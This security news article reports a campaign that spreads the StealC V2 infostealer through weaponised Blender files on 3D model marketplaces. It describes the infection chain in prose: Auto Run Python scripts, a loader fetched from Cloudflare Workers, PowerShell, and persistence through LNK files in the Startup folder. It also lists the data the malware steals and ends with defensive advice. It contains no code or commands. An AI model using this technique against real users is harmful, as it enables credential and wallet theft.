Beware: Malicious Blender Files Spreading StealC Malware
▼ Summary
– Russian-linked attackers deliver StealC V2 malware through malicious Blender files uploaded to 3D model marketplaces like CGTrader.
– The attack exploits Blender’s Auto Run feature, which executes embedded Python scripts that fetch malware loaders from Cloudflare Workers domains.
– The malware deploys StealC infostealer and an auxiliary Python stealer via PowerShell scripts, achieving persistence through LNK files in the Startup directory.
– StealC V2 has expanded capabilities to steal data from over 23 browsers, 100+ cryptocurrency wallets, and various communication and VPN clients.
– Users are advised to disable ‘Auto Run Python Scripts’ in Blender preferences and treat 3D assets as executable files, using sandboxed environments for untrusted sources.
A sophisticated cyberattack campaign with suspected Russian origins is now actively distributing the StealC V2 information stealer malware through weaponized Blender files uploaded to popular 3D model marketplaces such as CGTrader. This method exploits the trusted nature of digital content platforms to deliver dangerous payloads directly to users’ systems.
Blender, a widely used open-source application for 3D modeling and animation, supports the execution of Python scripts to automate tasks, create custom user interfaces, and manage complex rendering workflows. A feature known as Auto Run allows these scripts to activate automatically when a project file is opened, which is convenient for loading character rigs, facial controls, and specialized tool panels. Unfortunately, this same functionality presents a serious security risk if misused.
Cybersecurity analysts from Morphisec recently identified malicious .blend files containing embedded Python code. When opened with Auto Run enabled, the script contacts a Cloudflare Workers domain to retrieve a malware loader. This loader subsequently initiates a PowerShell script, which pulls two ZIP archives, named ZalypaGyliveraV1 and BLENDERX, from IP addresses under the attacker’s control.
After extraction into the system’s temporary folder, the malware places LNK files in the Windows Startup directory to ensure it runs every time the system boots. It then deploys two separate data-stealing components: the primary StealC infostealer and a secondary Python-based stealer, likely included as a backup to guarantee data theft.
Morphisec confirmed that the StealC sample used in this campaign represents the newest iteration of its second major version, which Zscaler previously analyzed. This updated StealC variant significantly broadens its data harvesting capabilities, now targeting credentials from more than 23 different web browsers, including compatibility with Chrome 132 and server-side decryption, as well as over 100 cryptocurrency wallet extensions and 15 standalone crypto wallet applications. It also extracts information from popular communication tools like Telegram, Discord, and Tox, along with VPN clients such as ProtonVPN and OpenVPN, and email applications like Thunderbird. Additionally, the malware employs an improved User Account Control (UAC) bypass technique to elevate privileges.
Despite being publicly known since 2023, StealC continues to evade many security solutions. Morphisec reported that at the time of their analysis, not a single antivirus engine on VirusTotal flagged the malicious sample.
Because 3D model marketplaces generally do not inspect the code within uploaded project files, users are strongly urged to practice caution. Disabling the auto-execution of Python scripts in Blender is a critical defensive step. This can be done by navigating to Edit > Preferences and unchecking the ‘Auto Run Python Scripts’ option. Users should treat downloaded 3D assets with the same caution as executable files, only obtaining content from trusted, reputable sources. For any files of uncertain origin, testing them within a sandboxed environment is highly recommended to prevent system compromise.
(Source: Bleeping Computer)
